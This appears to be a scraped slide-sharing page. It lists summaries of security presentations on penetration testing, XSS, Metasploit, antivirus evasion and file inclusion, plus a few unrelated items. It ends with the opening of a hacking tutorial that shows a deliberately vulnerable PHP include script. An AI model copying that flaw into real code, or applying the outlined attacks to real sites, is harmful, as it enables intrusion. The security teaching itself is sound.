The document is a presentation on threat hunting with Splunk. It discusses threat hunting basics, data sources for threat hunting, knowing your endpoint, and using the cyber kill chain framework. It outlines an agenda that includes a hands-on walkthrough of an attack scenario using Splunk's core capabilities. It also discusses advanced threat hunting techniques and tools, enterprise security walkthroughs, and applying machine learning and data science to security.
This presentation describes penetration testing with a Who, What, Where, When, and How approach. In the presentation, you may discover the common pitfalls of a bad penetration test and you could identify a better one. You should be able to recognize and differentiate both looking at the methods (attitude) and result.
An XSS attack is a type of vulnerability that allows malicious scripts to be injected into web pages viewed by other users. There are three main types: reflected XSS occurs when a link containing malicious code is clicked; stored XSS injects code directly into a vulnerable website, potentially affecting many users; DOM-based XSS involves injecting code into a website hosted on a user's local system, allowing the attacker to access that user's browser privileges. The document provides examples of how XSS attacks work and can be used to hijack accounts, insert hostile content, steal cookies, and redirect users.
These slides guides you through the tools and techniques one can use for footprinting websites or people.You will find amazing tools and techniques have a look
CNIT 124 Ch 13: Post Exploitation (Part 1)Sam Bowne
Slides for a college course in "Advanced Ethical Hacking" at CCSF. Instructor: Sam Bowne
Course Web page:
https://samsclass.info/124/124_F17.shtml
Based on "Penetration Testing: A Hands-On Introduction to Hacking" by Georgia Weidman -- ISBN-10: 1593275641, No Starch Press; 1 edition (June 8, 2014)
This 1-day course introduces network penetration testing concepts and provides an overview of the penetration testing process. It covers prerequisites, objectives, benefits, definitions, types of penetration testing and phases including reconnaissance, scanning, exploitation, and reporting. The goal is to prepare students to understand and assist with penetration tests, though they will not be able to independently conduct professional tests after this introductory course.
Understand AWS best practices for Distributed Denial of Service (DDoS) resiliency and how AWS Shield can assist you to protect your business. Uncover how this tool safeguards web applications running on AWS, and how always-on detection and automatic inline mitigations minimize application downtime and latency.
This document summarizes a presentation about penetration testing with Metasploit. It introduces penetration testing and why organizations use it. It then discusses the basics of Metasploit, including interfaces like MSFconsole. Key concepts in Metasploit like exploits, payloads, and Meterpreter are explained. The presentation demonstrates Metasploit against different operating systems like Windows XP, Windows 7, and Ubuntu. It shows how to find and use appropriate exploits and payloads to gain remote access and post-exploitation activities.
The document discusses penetration testing and related security concepts. It covers topics like vulnerability assessment, security audits, the differences between penetration testing and other assessments, common penetration testing methodologies, and the standard phases of information gathering, network mapping, vulnerability identification, exploitation, privilege escalation, maintaining access and covering tracks.
Conceito militar, agora aplicado a Cibersegurança, o "the cyber kill chain" foi desenvolvido pela Lockheed Martin em 2011. Ele descreve as fases que um adversário seguirá para alvejar uma Organização. São 7 fases bem definidas e este ataque é considerado bem sucedido
se / quando todas as fases foram realizadas.
(DOCUMENTO EM INGLÊS)
Web application attacks can take many forms, including cross-site scripting (XSS), SQL injection, parameter tampering, command injection, session management issues, cookie poisoning, directory traversal, cross-site request forgery, and buffer overflows. XSS is a vulnerability that allows malicious JavaScript code to be injected and run in a user's browser, potentially accessing data. SQL injection involves inserting SQL commands into a database query to gain unauthorized access. Parameter tampering modifies URL parameters to change expected behavior.
This document provides an overview of scanning techniques used in ethical hacking. It defines scanning as gathering information about IP addresses, operating systems, services, and architectures of target systems. The document outlines common scanning types like port scanning, network scanning, and vulnerability scanning. It also describes popular scanning tools like Nmap and Hping2, and scanning methods like ping sweeps, SYN stealth scans, and Xmas scans. The goal of scanning is to detect live systems, open ports, operating systems, and services to inform later stages of hacking like banner grabbing, vulnerability assessment, and network mapping.
Cross Site Scripting (XSS) is a vulnerability that allows malicious users to insert client-side code into web pages that is then executed by a user's browser. This code can steal cookies, access private information, perform actions on the user's behalf, and redirect them to malicious websites. XSS works by having the server display input containing malicious JavaScript from a request. There are different types of XSS attacks, including non-persistent, persistent, and DOM-based attacks. Prevention methods include validating, sanitizing, and escaping all user input on the server-side and client-side. Web vulnerability scanners like Burp Suite can help test for XSS and other vulnerabilities.
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
The document discusses various techniques attackers can use to launch executables remotely on Windows systems by leveraging compromised credentials and built-in OS functionality. It describes how to detect remotely launched executables using Windows Event and Sysmon logs. Specific techniques covered include remote file copy over SMB, remote execution via WMI, WinRM, Powershell Remoting, scheduled tasks, services, the registry, and WMI subscriptions. The document provides the event sequences and most interesting events to look for when hunting for evidence of each technique.
This document discusses techniques for evading antivirus and firewalls, including generating executable files with embedded PowerShell commands to execute backdoors, generating macro-enabled Excel files with encoded payloads to act as Trojans, and using the Shellter tool to dynamically inject shellcode into Windows applications. Figures are provided showing the use of tools like Metasploit and Unicorn to generate payloads and backdoors, embedding them in files, bypassing antivirus detection, and attackers gaining sessions on victim machines.
Google dorks are search operators used to refine Google searches. They can be used to access secure webpages, download files, or access security cameras. Common dorks include "site:", "inurl:", "intitle:", and "filetype:" or "ext:". SQL injection is a code injection technique that exploits security vulnerabilities in database applications. It works by inserting SQL commands into user input fields to alter the meaning of SQL queries and gain unauthorized access to databases. Defenses include input validation, prepared statements, limiting privileges, and intrusion detection systems.
The document contains PHP code for a website that displays and searches product information from a database. It includes:
1. Code to connect to a MySQL database and select the "banhang" database.
2. Index code that includes header, sidebar, content, and footer files. Content displays products and handles search/detail page links.
3. Product display code that queries the database and loops through results to show images, prices and links.
4. Category, search, and detail inclusion files that query the database to populate dropdowns, search results, and detailed product pages.
The document discusses assistive technology (AT) as defined by IDEA 2004 and various examples of AT. It notes that IDEA 2004 requires IEP teams to consider AT needs for students with disabilities and that schools must provide AT and training. Several types of AT are then described, including personal amplifiers for hearing loss which reduce background noise, CCTVs for visual impairments to magnify print, talking calculators for learning disabilities in math, and page turners for physical disabilities.
This document contains a list of over 150 potential SQL injection dorks targeting parameters with "id=" in the URL. The dorks target content management systems and databases on websites. It also contains generic dorks searching for SQL warning messages.
The document discusses content sniffing vulnerabilities in web browsers. It explains that browsers try to determine the true content type of a file, even if the server provides the wrong content type header. This allows an attacker to craft a file, like an image, that is also valid HTML containing JavaScript. When the browser content sniffs the file and treats it as HTML, the JavaScript will execute in the context of the vulnerable website. The document provides examples of how this can be used to steal cookies from users and perform cross-site scripting attacks. It recommends server and browser fixes like ensuring correct content type headers and adding headers to disable content sniffing.
La inteligencia artificial (IA) es el estudio interdisciplinario de cómo crear sistemas inteligentes, como la inteligencia humana. La IA se define como la capacidad de razonar de una máquina y abarca campos como las ciencias de la computación, las matemáticas y la filosofía. Aunque las máquinas no pueden pensar como los humanos, la IA ha permitido que simulen procesos complejos, aunque con limitaciones y el riesgo de posibles consecuencias negativas si pierden el control.
The document outlines details about the Certified Ethical Hacker (CEH) certification course. The 5-day, 8 hours per day course covers topics like footprinting, reconnaissance, scanning networks, system hacking, social engineering, and cryptography. Successful students will receive the CEH certification from EC-Council after passing the online exam on the last day of training. Contact information is provided for inquiries.
ELECTRONIC VOTING MACHINE(EVM) HACKABLE OR NOTSHUBHAM SAHU
This document discusses electronic voting machines (EVMs) in India and whether they can be hacked. It begins by describing what an EVM is and how it works. It then addresses whether EVMs can be hacked, explaining that while direct hacking is not possible, tampering with hardware is. The document outlines two attacks involving replacing EVM parts or using devices to change stored vote records. It notes that current safeguards are inadequate and that the lack of transparency in the EVM system means problems cannot be easily fixed. Frequently asked questions and sources are provided at the end.
This document provides instructions for making various configuration changes and restrictions in the Windows registry related to system, networking, and application settings. It includes over 50 entries organized by topic that describe how to modify registry keys and values to disable features, restrict access, and modify default behaviors. Examples include disabling the right click context menu, hiding drives, locking file associations, and restricting changes to the start menu and control panel options.
Google dorks, also known as Google hacking, involves using specific search operators and techniques on Google to find sensitive information on websites. Some key points made in the document include:
- Google dorking uses operators like "site:", "filetype:", "intitle:", and "inurl:" to refine search results and maximize search value. This can be used to uncover private information, configurations, backups, and vulnerabilities.
- Information found through Google hacking may remain exposed in Google's cache for months after being removed from websites.
- Google indexes everything publicly available on the internet, making it a powerful tool for passive information gathering, which is an important first step for hackers.
- The document encourages
This document contains notes on networking concepts including network requirements, communication media, networking devices, Ethernet cabling, OSI model, TCP/IP protocols, IP addressing, and classes of networks. It defines networking as the method of establishing a connection between two or more computers for data communication and sharing resources. Basic requirements for establishing a network include networking cards and communication media such as wired (coaxial cable, fiber optics, twisted pair) and wireless. Common networking devices are hubs, switches, routers, and bridges.
This document provides an overview of Metasploit for beginners. It discusses why Metasploit is useful, how to set up a demo environment, and how to use auxiliary and exploit modules. It then demonstrates auxiliary modules for scanning and information gathering. It also demonstrates two exploit modules against ElasticSearch and Jenkins, using reverse shell payloads. The document provides a cheat sheet for navigating msfconsole and describes common commands used prior to demonstrations.
The document contains a list of search strings that can be used to find potential vulnerabilities on websites and web applications. Some of the search strings look for pages indicating login portals for administrative access, content management systems, and other common internet-facing applications. Other search strings try to identify specific applications or technologies like vBulletin, ColdFusion, and iSecure. The overall document appears to be sharing ways to search for unprotected administrative or backend interfaces online.
Thwarting The Surveillance in Online Communication by Adhokshaj MishraOWASP Delhi
This document discusses techniques for countering online surveillance and protecting private communications. It begins by outlining common surveillance methods used by governments and companies, such as wiretapping and exploiting software vulnerabilities. It then discusses using cryptography to counter surveillance and keep data safe, such as encrypting files and filling volumes with cryptographically secure random data. Secure authentication techniques are presented that allow verifying credentials without revealing passwords. Finally, the document details a method for encrypting and authenticating private messages between two parties using Diffie-Hellman key exchange and digital signatures to provide encryption, authentication, deniability and perfect forward secrecy.
This document discusses common web application vulnerabilities and methods for preventing hacking. It covers code injection attacks using C99 shell, file inclusion vulnerabilities through remote and local file access, dictionary attacks, SQL injections, cross-site scripting (XSS), clickjacking, dynamic code evaluation, and countermeasures like input validation, output encoding, prepared statements, and avoiding dangerous functions. The goal is to explain how applications are hacked and defensive coding practices to prevent attacks.
This document discusses various vulnerabilities in PHP coding practices and provides examples of how each vulnerability can be exploited as well as how to fix them. It covers remote file inclusion, local file inclusion, local file disclosure, SQL injection, remote command execution, remote code execution, cross-site scripting, authentication bypass, and cross-site request forgery vulnerabilities. For each vulnerability, it provides a basic PHP code example to demonstrate the issue, how an attacker could exploit it, and recommendations on how to fix the vulnerable code, such as sanitizing user inputs, using prepared statements, and implementing authentication systems. The goal is to help PHP developers write more secure code and avoid common vulnerabilities.
This document discusses journeying from local file inclusion (LFI) vulnerabilities to remote code execution (RCE). It begins with an introduction and overview. It then covers LFI in detail, explaining how to find and exploit LFI vulnerabilities using directory traversal to read files. Next, it discusses remote file inclusion (RFI) and how it can lead to code execution. Prevention methods are outlined. Finally, it demonstrates exploiting LFI and RFI on a test server, verifying with phpinfo() and ping, before obtaining a reverse shell through a GET request. Common log locations are also listed.
This document summarizes techniques for exploiting local file inclusion (LFI) vulnerabilities to achieve remote command execution (RCE). It begins by explaining LFI and how it can be used to read local files. It then describes how LFI can be used to inject code into log files or environment variables to execute commands remotely. The document provides an introduction to using Perl sockets and libraries for creating HTTP requests, and gives an example Perl exploit script that uses log file injection to execute code via LFI. It concludes with recommendations for preventing LFI vulnerabilities.
This document discusses secure file upload in PHP web applications. It begins by describing a naive file upload implementation that allows arbitrary files to be uploaded, including PHP scripts that could execute commands on the server. It then discusses various approaches to make file uploads more secure, such as verifying the content type, image file contents, and file extensions. However, it notes that an attacker can bypass these checks by manipulating the HTTP request. The document concludes by providing a reference implementation for a more secure file upload process.
Table Of Content
The OWASP Top Ten
Invalidated Redirect and Forwards
Security Misconfiguration
Application Fingerprint
Error handling And Logging
Noise
PHP Guidelines
Web application security is an important topic gaining more attention. Sensitive data needs protection not only on servers but also when traveling over networks. Common web application vulnerabilities include cross-site scripting, SQL injection, and cross-site request forgery. Developers should implement measures like encryption, limiting file access and uploads, hiding errors, and using secure sessions to authenticate users. Security requires ongoing consideration to prevent network attacks, unauthorized access, and data theft.
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Ismail Tasdelen
The document discusses remote file inclusion (RFI) and local file inclusion (LFI) attacks and defenses. It provides examples of vulnerable code that allows RFI/LFI exploits by directly using unsanitized user input. It then demonstrates how to conduct RFI/LFI attacks to view files or execute commands on the server. Finally, it recommends sanitizing user input with functions like strip_tags(), htmlspecialchars(), and providing one's own cleaning function to prevent RFI/LFI exploits.
Local File Inclusion (LFI) vulnerabilities allow an attacker to include files from a web server by manipulating input that is used to include files. For example, a script that includes files based on a page parameter, like script.php?page=index.html, could be exploited by changing the page parameter to try and include files like ../../../../etc/passwd. Successful exploitation can reveal sensitive information like the server's password file. LFI vulnerabilities are common and can often be exploited through PHP wrappers like php://input or php://filter to include files or execute system commands on the server.
Short presentation on techniques for protecting against vulnerabilities in commonly available PHP packages using a combination of Apache + FastCGI + suEXEC + chroot + mod_security2
The document discusses various LAMP security practices such as preventing XSS attacks by sanitizing user input, using prepared statements to prevent SQL injection, disabling unnecessary modules and server information, limiting file uploads and access to the file system, and write protecting configuration files. It provides examples of code and configuration settings to implement these practices.
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Appsguestb0af15
The document discusses finding vulnerabilities in Flash applications through runtime analysis. It describes how uninitialized variables, external files, and dangerous native functions can be entry points for attacks. It then provides a recipe for analyzing a SWF at runtime to detect vulnerabilities, including using an analyzer framework that loads the SWF and implements resolution methods to detect undefined variables and inject attack patterns.
The document provides instructions for installing and setting up the Symfony PHP framework. It discusses different installation methods like using the sandbox, PEAR, or SVN. It also covers generating a new Symfony project and application, configuring the web server, and troubleshooting common issues. Version control of Symfony projects using Subversion is also described.
The document provides an overview of the Lumen micro-framework by Laravel. It discusses Lumen's system requirements, how to install Lumen using Composer or the Lumen installer, configuring pretty URLs, the directory structure, HTTP routing, middleware, controllers, and views. Additional features covered include caching, databases, encryption, errors and logging, events, queues, testing, and more full-stack features like authentication and mail.
This document provides an overview of the Phalcon PHP framework. It discusses why frameworks are important for PHP development and how traditional frameworks work. It then explains how Phalcon is different as it is implemented as a PHP extension written in C, making it faster than traditional frameworks. The document demonstrates how to install Phalcon, create a basic project structure, define controllers and models, and connect to a database.
PHP SA 2014 - Releasing Your Open Source Projectxsist10
The document provides guidance on releasing open source projects. It discusses security, hosting, managing source code, package management, design patterns, testing, and resources. The key recommendations are to focus on security, use GitHub for hosting, manage versions with SemVer, use Composer for dependencies, implement common design patterns, write unit tests with at least 80% coverage, and wrap resources to allow for mocking in tests.
This document summarizes a Drupal hack that occurred at the University of Toronto Libraries. The hack was detected by analyzing Apache logs and noticing odd traffic patterns, including many wp-conf requests. The hack exploited an FCKEditor bug and the PHP Filter module to inject malicious code that could execute PHP. This allowed the hacker to access files, databases, and user information. To recover, the organization restored from backups, disabled vulnerable modules, reset passwords, and improved security practices like access controls and updates. Lessons included following security guidelines, testing updates, using HTTPS, and establishing security processes and failure rehearsals.
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
During the session we will go through different methods of exploiting file upload pages in order to trigger Remote Code Execution, SQL Injection, Directory Traversal, DOS, Cross Site Scripting and else of web application vulnerabilities with demo codes. Also, we will see things from both Developers and Attackers side. What are the protections done by Developers to mitigate file upload issues by validating File Name, File Content-Type, actual File Content and how to bypass it All using 15 Technique!
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSHDavid Stockton
The document discusses setting up continuous integration using Hudson. It explains that Hudson automates build and deployment processes, provides instant feedback, and helps keep teams honest about tests. Setup involves installing Java, Hudson, and configuring a sample project in Hudson to build from a Git repository on each commit.
The document discusses search operators for Yandex, a Russian search engine. It provides examples of over 20 different Yandex boolean operators like +, -, &&, ||, and others. It explains what each operator does and provides examples of queries using the various operators to refine searches on Yandex. The boolean operators allow users to search for exact phrases, exclude terms, define word proximity, search specific fields, and more.
This document discusses social media intelligence and Twitter advanced search capabilities. It introduces Twitter, explaining that it is a microblogging platform and the 8th most popular website globally. The document also outlines different advanced search operators for Twitter including searching by words, phrases, hashtags, accounts, locations, dates, and tweet properties like whether they are positive, negative, questions, or retweets. It notes that advanced search allows more precise searching than basic search to collect social mentions for social media intelligence purposes.
OSINT Tool - Reconnaissance with Recon-ngRaghav Bisht
Recon-ng is a Python-based web reconnaissance framework that allows automated reconnaissance. It focuses on open-source intelligence gathering from web-based sources. The tool downloads from Bitbucket and has usage guides there. Recon-ng demonstrations show searching reverse domains, using the Builtwith and Punkspider modules to gather technical information, and using the LinkedIn module to find people at a specific company.
OSINT Tool - Reconnaissance with MaltegoRaghav Bisht
This document provides an overview of the open source intelligence (OSINT) tool Maltego. It describes what Maltego is, how it works, and how to install it. Maltego allows users to map relationships between entities like people, organizations, websites, domains, and IP addresses through the use of transforms. It gathers information from online sources and users can write their own transforms and machines. The document provides details on features of Maltego and how to download the commercial or community editions.
This document discusses search and advanced search features on LinkedIn. It introduces LinkedIn as a professional networking site and explains why it is useful for social media intelligence. It then describes LinkedIn's advanced search page and the various filters that can be used to refine searches, such as keywords, name, title, location, relationship filters, current/past companies, school, languages, interests, and premium member filters. Finally, it explains how Boolean operators like AND, OR, NOT, parentheses, and quotation marks can be used to perform more complex searches on LinkedIn.
The document discusses social media intelligence (SOCMINT) and how to use Facebook's graph search and search functions to find information about people. It provides examples of different types of queries that can be used to search for people by name, age, location, school, likes, photos, posts, and more. The case study demonstrates how to use these search functions to find information about a black hat hacker named Shadow Walker.
The document discusses the different layers of the internet, including the clearweb which is accessible via search engines, the dark web which search engines don't index, and the deep web which requires special software like Tor or I2P to access. It provides an overview of Tor and I2P anonymity networks, and how to configure them to access the deep web through URLs ending in .onion rather than standard top-level domains. The document also gives an example of a hidden wiki URL that can only be accessed through the Tor browser, not a regular browser.
Ethical Hacking (CEH) - Industrial Training ReportRaghav Bisht
This document is Raghav Bisht's report on his 6-week summer training at Bytec0de Securities PVT. LTD from May 25th to July 25th 2013 under the guidance of Mr. Mohit Yadav. The report provides an overview of the training organization, outlines the training objectives and course topics covered, and thanks those who supported his training experience. Key topics covered in the training included introduction to hacking and security, ethical hacking, technology aspects of IT security, hacking steps and techniques like DDoS attacks, wireless hacking, SQL injection, and penetration testing.
SQL injection is a code injection technique where malicious SQL statements are inserted into an entry field for execution, allowing a hacker to interfere with a database-driven application's interaction with backend databases. There are different types of SQL injections, including union-based, error-based, and blind SQL injections. Authentication can also be bypassed through SQL injection by making logical conditions like 1=1 or ""="" always true. The document provides examples of SQL injection payloads and demo websites to practice SQL injection techniques.
OS command injection vulnerabilities occur when user input is not sanitized before being passed to a shell command interpreter. This allows attackers to inject arbitrary commands that will be executed by the server, potentially compromising the server or application data. Command injection vulnerabilities are serious because they may enable attackers to use the server as a platform for launching attacks against other systems. Commix is an open source tool that can detect and exploit command injection vulnerabilities.
Introduction To Vulnerability Assessment & Penetration TestingRaghav Bisht
A vulnerability assessment identifies vulnerabilities in systems and networks to understand threats and risks. Penetration testing simulates cyber attacks to detect exploitable vulnerabilities. There are three types of penetration testing: black box with no system info; white box with full system info; and grey box with some system info. Common vulnerabilities include SQL injection, XSS, weak authentication, insecure storage, and unvalidated redirects. Tools like Nexpose, QualysGuard, and OpenVAS can automate vulnerability assessments.
Introduction To Exploitation & MetasploitRaghav Bisht
Penetration testing involves evaluating systems or networks using malicious techniques to identify security vulnerabilities. It is done by exploiting vulnerabilities to gain unauthorized access to sensitive information. Common vulnerabilities arise from design errors, poor configuration, and human error. Penetration testing is conducted to secure government data transfers, protect brands, and find vulnerabilities in applications, operating systems, databases, and network equipment. Metasploit is an open-source framework used for hacking applications and operating systems that contains exploits, payloads, and modules. Msfconsole is an interface used to launch attacks and create listeners in Metasploit.
Hacking involves exploiting vulnerabilities in computer systems or networks to gain unauthorized access. There are different types of hackers, including white hat hackers who perform ethical hacking to test security, black hat hackers who perform hacking with malicious intent, and grey hat hackers who may sometimes hack ethically and sometimes not. Ethical hacking involves testing one's own systems for vulnerabilities without causing harm. Vulnerability assessments and penetration tests are common ethical hacking techniques that involve scanning for vulnerabilities and attempting to exploit them in a controlled way. Popular tools used for ethical hacking include Kali Linux, Nmap, Metasploit, and John the Ripper.
Directory traversal, also known as path traversal, allows attackers to access files and directories outside of the web server's designated root folder. This can lead to attacks like file inclusion, where malicious code is executed on the server, and source code disclosure, where sensitive application code is revealed. Local file inclusion allows attackers to include files from the local web server, while remote file inclusion includes files from external websites, potentially allowing remote code execution on the vulnerable server.
This document provides an introduction to hacking and security, defining key terms. It explains that hacking involves exploiting vulnerabilities to achieve unauthorized access. Hackers are classified as white hats (ethical), black hats (crackers), or grey hats. The document outlines the importance of understanding systems to secure them through ethical hacking and penetration testing. It lists certifications in security and provides keywords and terms for hackers to be familiar with.
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-InTrustArc
Six months into 2024, and it is clear the privacy ecosystem takes no days off!! Regulators continue to implement and enforce new regulations, businesses strive to meet requirements, and technology advances like AI have privacy professionals scratching their heads about managing risk.
What can we learn about the first six months of data privacy trends and events in 2024? How should this inform your privacy program management for the rest of the year?
Join TrustArc, Goodwin, and Snyk privacy experts as they discuss the changes we’ve seen in the first half of 2024 and gain insight into the concrete, actionable steps you can take to up-level your privacy program in the second half of the year.
This webinar will review:
- Key changes to privacy regulations in 2024
- Key themes in privacy and data governance in 2024
- How to maximize your privacy program in the second half of 2024
Comparison Table of DiskWarrior Alternatives.pdfAndrey Yasko
To help you choose the best DiskWarrior alternative, we've compiled a comparison table summarizing the features, pros, cons, and pricing of six alternatives.
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...Chris Swan
Have you noticed the OpenSSF Scorecard badges on the official Dart and Flutter repos? It's Google's way of showing that they care about security. Practices such as pinning dependencies, branch protection, required reviews, continuous integration tests etc. are measured to provide a score and accompanying badge.
You can do the same for your projects, and this presentation will show you how, with an emphasis on the unique challenges that come up when working with Dart and Flutter.
The session will provide a walkthrough of the steps involved in securing a first repository, and then what it takes to repeat that process across an organization with multiple repos. It will also look at the ongoing maintenance involved once scorecards have been implemented, and how aspects of that maintenance can be better automated to minimize toil.
Coordinate Systems in FME 101 - Webinar SlidesSafe Software
If you’ve ever had to analyze a map or GPS data, chances are you’ve encountered and even worked with coordinate systems. As historical data continually updates through GPS, understanding coordinate systems is increasingly crucial. However, not everyone knows why they exist or how to effectively use them for data-driven insights.
During this webinar, you’ll learn exactly what coordinate systems are and how you can use FME to maintain and transform your data’s coordinate systems in an easy-to-digest way, accurately representing the geographical space that it exists within. During this webinar, you will have the chance to:
- Enhance Your Understanding: Gain a clear overview of what coordinate systems are and their value
- Learn Practical Applications: Why we need datams and projections, plus units between coordinate systems
- Maximize with FME: Understand how FME handles coordinate systems, including a brief summary of the 3 main reprojectors
- Custom Coordinate Systems: Learn how to work with FME and coordinate systems beyond what is natively supported
- Look Ahead: Gain insights into where FME is headed with coordinate systems in the future
Don’t miss the opportunity to improve the value you receive from your coordinate system data, ultimately allowing you to streamline your data analysis and maximize your time. See you there!
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptxSynapseIndia
Your comprehensive guide to RPA in healthcare for 2024. Explore the benefits, use cases, and emerging trends of robotic process automation. Understand the challenges and prepare for the future of healthcare automation
The Rise of Supernetwork Data Intensive ComputingLarry Smarr
Invited Remote Lecture to SC21
The International Conference for High Performance Computing, Networking, Storage, and Analysis
St. Louis, Missouri
November 18, 2021
YOUR RELIABLE WEB DESIGN & DEVELOPMENT TEAM — FOR LASTING SUCCESS
WPRiders is a web development company specialized in WordPress and WooCommerce websites and plugins for customers around the world. The company is headquartered in Bucharest, Romania, but our team members are located all over the world. Our customers are primarily from the US and Western Europe, but we have clients from Australia, Canada and other areas as well.
Some facts about WPRiders and why we are one of the best firms around:
More than 700 five-star reviews! You can check them here.
1500 WordPress projects delivered.
We respond 80% faster than other firms! Data provided by Freshdesk.
We’ve been in business since 2015.
We are located in 7 countries and have 22 team members.
With so many projects delivered, our team knows what works and what doesn’t when it comes to WordPress and WooCommerce.
Our team members are:
- highly experienced developers (employees & contractors with 5 -10+ years of experience),
- great designers with an eye for UX/UI with 10+ years of experience
- project managers with development background who speak both tech and non-tech
- QA specialists
- Conversion Rate Optimisation - CRO experts
They are all working together to provide you with the best possible service. We are passionate about WordPress, and we love creating custom solutions that help our clients achieve their goals.
At WPRiders, we are committed to building long-term relationships with our clients. We believe in accountability, in doing the right thing, as well as in transparency and open communication. You can read more about WPRiders on the About us page.
Blockchain technology is transforming industries and reshaping the way we conduct business, manage data, and secure transactions. Whether you're new to blockchain or looking to deepen your knowledge, our guidebook, "Blockchain for Dummies", is your ultimate resource.
7 Most Powerful Solar Storms in the History of Earth.pdfEnterprise Wired
Solar Storms (Geo Magnetic Storms) are the motion of accelerated charged particles in the solar environment with high velocities due to the coronal mass ejection (CME).
Implementations of Fused Deposition Modeling in real worldEmerging Tech
The presentation showcases the diverse real-world applications of Fused Deposition Modeling (FDM) across multiple industries:
1. **Manufacturing**: FDM is utilized in manufacturing for rapid prototyping, creating custom tools and fixtures, and producing functional end-use parts. Companies leverage its cost-effectiveness and flexibility to streamline production processes.
2. **Medical**: In the medical field, FDM is used to create patient-specific anatomical models, surgical guides, and prosthetics. Its ability to produce precise and biocompatible parts supports advancements in personalized healthcare solutions.
3. **Education**: FDM plays a crucial role in education by enabling students to learn about design and engineering through hands-on 3D printing projects. It promotes innovation and practical skill development in STEM disciplines.
4. **Science**: Researchers use FDM to prototype equipment for scientific experiments, build custom laboratory tools, and create models for visualization and testing purposes. It facilitates rapid iteration and customization in scientific endeavors.
5. **Automotive**: Automotive manufacturers employ FDM for prototyping vehicle components, tooling for assembly lines, and customized parts. It speeds up the design validation process and enhances efficiency in automotive engineering.
6. **Consumer Electronics**: FDM is utilized in consumer electronics for designing and prototyping product enclosures, casings, and internal components. It enables rapid iteration and customization to meet evolving consumer demands.
7. **Robotics**: Robotics engineers leverage FDM to prototype robot parts, create lightweight and durable components, and customize robot designs for specific applications. It supports innovation and optimization in robotic systems.
8. **Aerospace**: In aerospace, FDM is used to manufacture lightweight parts, complex geometries, and prototypes of aircraft components. It contributes to cost reduction, faster production cycles, and weight savings in aerospace engineering.
9. **Architecture**: Architects utilize FDM for creating detailed architectural models, prototypes of building components, and intricate designs. It aids in visualizing concepts, testing structural integrity, and communicating design ideas effectively.
Each industry example demonstrates how FDM enhances innovation, accelerates product development, and addresses specific challenges through advanced manufacturing capabilities.
Kief Morris rethinks the infrastructure code delivery lifecycle, advocating for a shift towards composable infrastructure systems. We should shift to designing around deployable components rather than code modules, use more useful levels of abstraction, and drive design and deployment from applications rather than bottom-up, monolithic architecture and delivery.
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdfNeo4j
Presented at Gartner Data & Analytics, London Maty 2024. BT Group has used the Neo4j Graph Database to enable impressive digital transformation programs over the last 6 years. By re-imagining their operational support systems to adopt self-serve and data lead principles they have substantially reduced the number of applications and complexity of their operations. The result has been a substantial reduction in risk and costs while improving time to value, innovation, and process automation. Join this session to hear their story, the lessons they learned along the way and how their future innovation plans include the exploration of uses of EKG + Generative AI.
Transcript: Details of description part II: Describing images in practice - T...BookNet Canada
This presentation explores the practical application of image description techniques. Familiar guidelines will be demonstrated in practice, and descriptions will be developed “live”! If you have learned a lot about the theory of image description techniques but want to feel more confident putting them into practice, this is the presentation for you. There will be useful, actionable information for everyone, whether you are working with authors, colleagues, alone, or leveraging AI as a collaborator.
Link to presentation recording and slides: https://bnctechforum.ca/sessions/details-of-description-part-ii-describing-images-in-practice/
Presented by BookNet Canada on June 25, 2024, with support from the Department of Canadian Heritage.
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - MydbopsMydbops
This presentation, delivered at the Postgres Bangalore (PGBLR) Meetup-2 on June 29th, 2024, dives deep into connection pooling for PostgreSQL databases. Aakash M, a PostgreSQL Tech Lead at Mydbops, explores the challenges of managing numerous connections and explains how connection pooling optimizes performance and resource utilization.
Key Takeaways:
* Understand why connection pooling is essential for high-traffic applications
* Explore various connection poolers available for PostgreSQL, including pgbouncer
* Learn the configuration options and functionalities of pgbouncer
* Discover best practices for monitoring and troubleshooting connection pooling setups
* Gain insights into real-world use cases and considerations for production environments
This presentation is ideal for:
* Database administrators (DBAs)
* Developers working with PostgreSQL
* DevOps engineers
* Anyone interested in optimizing PostgreSQL performance
Contact info@mydbops.com for PostgreSQL Managed, Consulting and Remote DBA Services
2. Part 1
Web-hacking Attacks
This is a tutorial about web-hacking methods that I and many other hackers have collected.
I thought that many people would learn a lot from this here.
Guide content :
Remote file inclusion
Localfile inclusion
LFI 2 RCE
LFI 2 RCE Using Firefox
Localfile download
Full path disclosure
CommandInjectionVulnerability Exploit
SQL Injection - with load file
MSSQLInjection
Blind SQL Injection
Postgre SQLInjection
Error based Postgre SQLInjection
SQL Injection on ASPX
Dot net nuke
XSS
CRLF
CSRF
Server Side Includes | Server Side Inclusion
Symlink Attack
Sql injection String & Union based
Xpath Injection
LDAP Injection
DNS Zone TransferVulnerability Exploit
Oracle Padding Attack Using Brup Suite
3. So let’s get started !
Remote file inclusion :
1) RFI
RFI (Remote File Inclusion) is type of web-hacking. It occurs when the PHP script uses
functions include () to include some files for a GET method. This file is usually in txt format
pages whose content is printed.
Example:
Code:
http://www.site.com/index.php?page=home
Now a days RFI is rarely in use and all you need to use it on some vulnerable site is shell in txt
format.
2) Vulnerable script
Code:
<?php
$page = $_GET['page'];
include($page);
?>
3) Exploiting vulnerability
We have site:
Code:
